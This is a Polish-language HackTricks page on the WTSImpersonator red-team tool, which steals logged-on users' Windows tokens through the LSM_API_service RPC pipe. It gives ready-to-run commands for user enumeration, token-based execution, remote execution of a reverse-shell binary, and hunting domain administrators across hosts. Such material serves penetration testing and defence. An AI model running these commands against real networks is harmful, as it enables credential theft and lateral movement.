mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-25 03:15:12 +00:00
3.3 KiB
3.3 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną na HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud na GitHubie.
The WTS Impersonator narzędzie wykorzystuje nazwaną rurę RPC "\pipe\LSM_API_service" do dyskretnego wyliczenia zalogowanych użytkowników i przejęcia ich tokenów, omijając tradycyjne techniki podszycia się pod token. Ten podejście ułatwia płynne ruchy boczne w sieciach. Innowacyjność tej techniki przypisuje się Omri Baso, którego praca jest dostępna na GitHub.
Główne funkcje
Narzędzie działa poprzez sekwencję wywołań API:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Kluczowe moduły i użycie
- Wyliczanie użytkowników: Narzędzie umożliwia lokalne i zdalne wyliczanie użytkowników za pomocą poleceń dla obu scenariuszy:
- Lokalnie:
.\WTSImpersonator.exe -m enum
- Zdalnie, poprzez podanie adresu IP lub nazwy hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Wykonywanie poleceń: Moduły
exec
iexec-remote
wymagają kontekstu Usługi, aby działać. Lokalne wykonanie wymaga jedynie pliku wykonywalnego WTSImpersonator i polecenia: - Przykład wykonania polecenia lokalnie:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- Do uzyskania kontekstu usługi można użyć PsExec64.exe:
.\PsExec64.exe -accepteula -s cmd.exe
- Zdalne wykonanie polecenia: Polega na tworzeniu i instalowaniu usługi zdalnie, podobnie jak w przypadku PsExec.exe, umożliwiając wykonanie z odpowiednimi uprawnieniami.
- Przykład zdalnego wykonania:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Moduł łowcy użytkowników: Celuje w określonych użytkowników na wielu maszynach, wykonując kod pod ich poświadczeniami. Jest to szczególnie przydatne do celowania w Administratorów domeny z lokalnymi uprawnieniami administratora na kilku systemach.
- Przykład użycia:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe